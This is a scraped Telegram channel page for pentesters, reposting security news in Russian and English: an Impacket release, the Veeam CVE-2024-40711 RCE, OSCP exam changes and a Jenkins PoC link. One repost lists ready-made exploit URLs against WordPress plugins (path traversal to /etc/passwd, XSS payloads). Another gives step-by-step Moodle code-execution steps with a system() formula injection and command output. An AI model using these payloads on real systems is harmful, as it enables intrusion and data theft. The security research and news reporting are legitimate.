Pentester's Backlog
Когда-нибудь я точно за это возьмусь
Show more236
Subscribers
No data24 hours
+47 days
+2430 days
- Subscribers
- Post coverage
- ER - engagement ratio
Data loading in progress...
Subscriber growth rate
Data loading in progress...
Repost from SecuriXy.kz
Photo unavailableShow in Telegram
Обновление легендарного инструмента #Impacket от Fortra до версии 0.12.0 включает несколько значительных улучшений:
1. Поддержка протоколов: Расширена поддержка Ethernet, Linux "Cooked" capture. IP, TCP, UDP, ICMP, IGMP, ARP. Поддержка IPv4 и IPv6. NMB и SMB1, SMB2 и SMB3 (высокоуровневые реализации). MSRPC версии 5, через различные транспорты: TCP, SMB/TCP, SMB/NetBIOS и HTTP. Обычная, NTLM и Kerberos аутентификация, с использованием паролей/хашей/билетов/ключей. Частичная/полная реализация следующих интерфейсов MSRPC: EPM, DTYPES, LSAD, LSAT, NRPC, RRP, SAMR, SRVS, WKST, SCMR, BKRP, DHCPM, EVEN6, MGMT, SASEC, TSCH, DCOM, WMI, OXABREF, NSPI, OXNSPI. Частичная реализация протоколов TDS (MSSQL) и LDAP.
2. Улучшение безопасности и Исправления багов
3. Поддержка новых версий Python3
Для полного списка изменений и загрузки новой версии вы можете посетить релиз на GitHub.
pipx install impacket🥱 3🔥 1
Repost from Pentester
Veeam Backup & Response — RCE (CVE-2024-40711)
A critical deserialization vulnerability in .NET Remoting has been discovered in Veeam Backup & Replication, allowing unauthenticated remote code execution (RCE). The flaw affects versions 12.1.2.172 and earlier.
Research:
https://labs.watchtowr.com/veeam-backup-response-rce-with-auth-but-mostly-without-auth-cve-2024-40711-2/
Source:
https://github.com/watchtowrlabs/CVE-2024-40711
Veeam Backup & Response - RCE With Auth, But Mostly Without Auth (CVE-2024-40711)
Every sysadmin is familiar with Veeam’s enterprise-oriented backup solution, ‘Veeam Backup & Replication’. Unfortunately, so is every ransomware operator, given it's somewhat 'privileged position' in the storage world of most enterprise's networks. There's no point deploying cryptolocker malware on a target unless you can also deny access to backups, and
Repost from Pentester
Veeam Backup & Response - RCE With Auth, But Mostly Without Auth (CVE-2024-40711)
https://labs.watchtowr.com/veeam-backup-response-rce-with-auth-but-mostly-without-auth-cve-2024-40711-2/
Veeam Backup & Response - RCE With Auth, But Mostly Without Auth (CVE-2024-40711)
Every sysadmin is familiar with Veeam’s enterprise-oriented backup solution, ‘Veeam Backup & Replication’. Unfortunately, so is every ransomware operator, given it's somewhat 'privileged position' in the storage world of most enterprise's networks. There's no point deploying cryptolocker malware on a target unless you can also deny access to backups, and
Photo unavailableShow in Telegram
🔴 Ахтунг!
Offensive Security обновили формат сдачи своего самого популярного экзамена OSCP!
Начиная с 1го ноября 2024г. пользователи имеют право обновить свой сертификат до версии OSCP+ (действителен 3 года), подтверждающий что данный человек сдал актуальную программу экзамена и ничего не забыл
🥲 Станет невозможным получить 10 дополнительных экзаменационных баллов за решение всех лабораторных работ.
Помимо прочего, изменения в сдаче экзамена так же коснутся по части внутреннего пентеста Active Directory (подробнее на скриншоте).
Стоимость обновления сертификата OSCP -> OSCP+
200$ (до 1 апреля 2025 г., после - 799$).
Repost from Proxy Bar
Прекрасное в мире плагинов WordPress
*
simple-image-manipulator
/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ebuddypress-component-stats
/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwddzs-videogallery
/wp-content/plugins/dzs-videogallery/admin/upload.php/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Efancy-product-designer
/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.phphd-webplayer
/wp-content/plugins/hd-webplayer/playlist.php/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwdRepost from Proxy Bar
00:16
Video unavailableShow in Telegram
CVE-2024-43044 Jenkins
*
WriteUP
*
POC exploit
#jenkins
jenkins.gif.mp40.81 KB
👍 1
Repost from Cybred
https://blog.redteam-pentesting.de/2024/moodle-rce/
RCE в системе, которую любят использовать вузы во всем мире.
1. Создать вычисляемый вопрос
2. Изменить формулу ответа на
(1)->{system($_GET[chr(97)])}
3. Сохранить
4. Добавить к URL &a=id или любую другую команду
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
<!DOCTYPE html>
<html dir="ltr" lang="en" xml:lang="en">
<head>
<title>Editing a Calculated question | Test</title>
[...]Back to School - Exploiting a Remote Code Execution Vulnerability in Moodle
Surprisingly often, implementations include functionality where user input is passed to dangerous functions like PHP’s eval() - despite clear warnings. Often, devs are somewhat aware of this danger and attempt to sanitize the input, but this approach …
👍 1
Choose a Different Plan
Your current plan allows analytics for only 5 channels. To get more, please choose a different plan.